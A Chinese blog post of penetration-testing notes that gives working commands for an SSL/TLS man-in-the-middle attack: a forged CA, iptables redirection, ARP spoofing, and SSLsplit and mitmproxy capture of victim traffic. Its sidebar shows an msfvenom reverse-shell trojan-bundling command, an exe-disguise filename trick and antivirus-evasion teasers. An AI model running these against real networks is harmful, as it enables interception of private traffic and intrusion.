【渗透测试笔记】之【SSL/TLS中间人攻击】

最新推荐文章于 2022-08-24 09:40:29 发布
最新推荐文章于 2022-08-24 09:40:29 发布
阅读量555 收藏 1
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/107691679
版权

SSLsplit

  • 伪装服务器需要证书

利用openssl 生成证书私钥

openssl genrsa -out ca.key 2048

在这里插入图片描述

利用私钥签名生成根证书

openssl req -new -x509 -days 3650 -key ca.key -out ca.crt

依次输入

国家简称(CN)
省
市
公司名
单位名称
全限定域名
Email

在这里插入图片描述

启动路由功能

sysctl -w net.ipv4.ip_forward=1

配置规则

iptables -t net -F  # 清空规则
netstat -pantu  # 将占用80、443端口的程序结束占用
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443  # MSA
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443  # SMTPS
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443  # IMAPS
iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443  # POP3S
iptables -t nat -L  # 查看配置

ARP 欺骗

在这里插入图片描述

启动SSLsplit

需要建立好/root/Desktop/sslsplit/logdir 目录

mkdir logdir
sslsplit -D -l /root/Desktop/sslsplit/connect.log -j /root/Desktop/sslsplit -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

开始中间人攻击
在这里插入图片描述
connect.log是连接信息,logdir是传输的信息
在目标机器上百度123123123

cd logdir
grep 123123123 *

在这里插入图片描述

cat 20200730T093217Z-192.168.2.101,1348-103.235.46.122,80.log

在这里插入图片描述

Mitmproxy

arp欺骗之前的步骤一样,除了配置规则:

iptables -F  # 清空规则
netstat -pantu  # 将占用80、443端口的程序结束占用
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -P tcp --dport 443 -j REDIRECT --to-ports 8080

启动

mitmproxy -T --host -w mitmproxy.log
AA8j
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Netty和SSL/TLS应用例子
12-22
本源代码例子实现了Socket服务端和客户端,以及Http服务端和客户端;采用了Netty框架,实现SSL/TLS支持。
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
12-26
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
TLSSSL协议中发现可实施MITM攻击的安全漏洞
justinyun
11-09 539
 安全研究员Marsh Ray与Steve Dispensa指出,TLS 1.0+与SSL 3.0+协议中存在安全漏洞,可被用于实施中间人攻击(man-in-the-middle,MITM)。TLS的问题主要出在“认证空档”(authentication gap)上,在加密认证流程中,由于服务器与客户端之间的认证会出现不持续的状况,使得攻击者可趁机绑架数据串。这个漏洞也让攻击者
SSL/TLS一键配置工具下载
02-08
1、IIS Crypto 是一个免费工具,使管理员能够在 Windows Server 2008、2012、2016、2019 和 2022 上启用或禁用协议、密码、哈希和密钥交换算法。 2、允许您重新排序 IIS 提供的 SSL/TLS 密码套件、更改高级设置、通过单击实施最佳实践、创建自定义模板和测试您的网站。
.net中为 SSL/TLS 安全通道建立信任关系
09-14
.net中为 SSL/TLS 安全通道建立信任关系
SSL破解工具SSLsplit.zip
07-16
SSLsplit 是一个针对SSL/TLS加密的网络连接进行攻击,为网络取证和渗透测试的工具。它会终止SSL / TLS和启动一个新的连接到原来的目的地,记录所有传输的数据。它支持普通的TCP和SSL,HTTP和HTTPS,和IPv4和IPv6。为SSL和HTTPS,它生成并签署伪造X509v3证书上飞使用的原始凭证的主题DN和subjectAltName扩展。它支持服务器名称显示,RSA,DSA和ECDSA密钥,DHE 和ECDHE密码套件。如果私钥是可用的,它也可以使用现有的证书SSLsplit is a tool that performs man-in-the-middle attacks against SSL/TLS encrypted network connections for network forensics and penetration testing. It terminates SSL/TLS and initiates a new connection to the original destination, logging all data transmitted. It supports plain TCP and SSL, HTTP and HTTPS, and IPv4 and IPv6. For SSL and HTTPS, it generates and signs forged X509v3 certificates on-the-fly using the original certificate's subject DN and subjectAltName extension. It supports Server Name Indication, RSA, DSA, and ECDSA keys, and DHE and ECDHE cipher suites. It can also use existing certificates if the private key is available.
SSL_TLS 攻击原理解析
hl1293348082的专栏
03-25 2098
本文主要描述 HTTPS 中对于 ssl/tls 加密的攻击手法,什么是 HTTPS 呢?百度百科的解释如下: HTTPS(全称:Hyper Text Transfer Protocol over Secure Socket Layer),是以安全为目标的 HTTP 通道,简单讲是 HTTP 的安全版。即 HTTP 下加入 SSL 层,HTTPS 的安全基础是 SSL,因此加密的详细内容就需要 SSL。 0x01 知识铺垫 ssl/tls 用途 1、为实现 CIA (保密性, 完整性, 可用性)
关于精准打击自签名伪造SSL/TLS “受信任域名证书”的方案
liulilittle的博客
05-12 870
目前有两种方法可以实现精准打击 “自签名伪造SSL/TLS “受信任域名证书” 1、普通人可以实现的精准打击方案。 当 “SSL/TLS” 数据经过您的路由流通时,监控目标SSL服务器下发的 “明文公钥证书”,从明文证书上提取关键信息,在从伪造域名的SSL/TLS服务器上拉取公钥证书,对两个证书的进行对比,则可以确定是否是通过 SSL/TLS “受信任域名证书” 来实现不可告人的目的,尤其是在泉州市内实行不可告人的目的,自然真实的域公钥证书需要缓存否则每次都拉起效率会很低。 2、基于实力地位的精准
针对SSL/TLS的拒绝服务攻击以及使用ettercap进行DNS欺骗
weixin_33778544的博客
12-02 263
一. thc-ssl-dos 1.简介 (1).SSL 协商加密对性能开销增加,大量握手请求会导致 DOS (2).利用 SSL secure Renegotiation 特性,在单一 TCP 连接中生成数千个 SSL 重连接请求,造成服务器资源过载 (3).与流量式拒绝访问攻击不同,thc-ssl-dos 可以利用 dsl 线路打垮 30G 带宽的服务器 (4).服务...
Key 检测模块
lpaim的博客
08-24 240
Key 检测模块
支持GM SSL/TLS解析的wireshark
10-12
GM/T 没有单独规范 SSL协议的文件,而是在SSL 技术规范中定义了国密SSL协议。 TLS协议号为0x0301 0x0302 0x0303,分别表示TLS1.0 1.1 1.2,而国密SSL版本号为0x0101,其参考了TLS1.1 本Wireshark支持解析该报文
JAVA实现的SSL/TLS双向认证源代码
02-02
压缩包里有客户端源码和服务器端源码,支持TCP的双向认证,也支持WEBSOCKET的双向认证,内附测试 wss的测试例子, 需要生成PKCS12的证书,导入浏览器才可以测试。
tls.rar_ tls protocol_TLS_ssl_ssl/tls_tls pdf
09-19
一个关于ssl通信协议的文档,需要的可以下载
Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本
06-09
Windows Server 合规漏洞修复,修复Windows Server CVE-2016-2183 SSL/TLS协议信息泄露漏洞修复脚本,基于Windows PowerShell, 兼容Windows Server 2016/2019,防止Sweet32 生日攻击
渗透测试笔记】之【内网渗透——横向移动:PsExec的使用】
AA8j的博客
11-18 7252
文章目录1. PsTools工具包中的PsExec1.1 注意事项1.2 使用方法1.2.1 获得交互式shell1.2.2 执行单条命令并回显2. CS中的PsExec2.1 查看目标所在网段其它主机2.2 使用PsExec横向移动3. msf中的PsExec3.1 添加路由3.2 加载模块,设置目标IP、账号、密码及设置payload 1. PsTools工具包中的PsExec 地址:https://download.sysinternals.com/files/PSTools.zip 1.1 注意事项
渗透测试笔记】之【Python免杀——两行代码免杀。VT查杀率:10/68(思路:将ShellCode和Loader一起分离免杀)】
AA8j的博客
10-24 5519
文章目录1. shellcode Loader1.1 生成shellcode1.2 shellcode loader 脚本上线测试1.3 使用pyinstaller生成exe文件上线测试1.4 VT查杀率:24/682. ShellCode 分离2.1 上传加密后的shellcode2.2 改写shellcode loader2.3 shellcode 分离后shellcode loader脚本上线测试2.4 shellcode 分离后,使用pyinstaller生成exe文件上线测试2.5 VT查杀率:1
渗透测试笔记】之【钓鱼姿势——exe捆绑与免杀】
AA8j的博客
07-06 4988
准备被捆绑程序: 输入:msfvenom -p windows/meterpreter/reverse_http lhost=x.x.x.x lport=55555 -e x86/shikata_ga_nai -i 15 -f exe -b '\x00\x0a\x0d' -x ~/Desktop/inst.exe > ~/Desktop/Trojan/test_msf_360.exe 目标主机执行,成功上线: ...
渗透测试笔记】之【钓鱼姿势——exe伪装word文档(exe图标修改方法)】
AA8j的博客
07-06 4516
文件后缀倒序+图标伪装 加入icon图标: 提取icon图标工具:BeCyIconGrabber 加入icon图标工具:Restorator 2018 首先将exe拖入: 右键添加资源: 选择 图标,名称随便写: 拖入icon: 另存: 重命名py脚本: import os os.rename('shellcode.exe', 'x\u202excod.exe') 效果: ...
渗透测试笔记】之【内网渗透——CS流量隐蔽】
AA8j的博客
11-22 4492
文章目录1. 端口特征2. 证书特征2. 配置CDN3. 生成自定义配置文件4. 效果演示 1. 端口特征 vim teamserver 将默认端口修改: -Dcobaltstrike.server_port=64444 2. 证书特征 删除原有证书(第一次启动会生成cobaltstrike.store),创建新证书cobaltstrike.store rm cobaltstrike.store keytool -keystore cobaltstrike.store -storepass 12345
ssl/tls的优缺点
最新发布
05-24
2. 防止中间人攻击:使用SSL/TLS可以防止中间人攻击,确保数据传输的真实性和可信度。 3. 支持多种协议:SSL/TLS可以支持多种安全协议,包括HTTPS、FTP、SMTP等,可以满足不同的安全需求。 4. 兼容性好:SSL/TLS可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值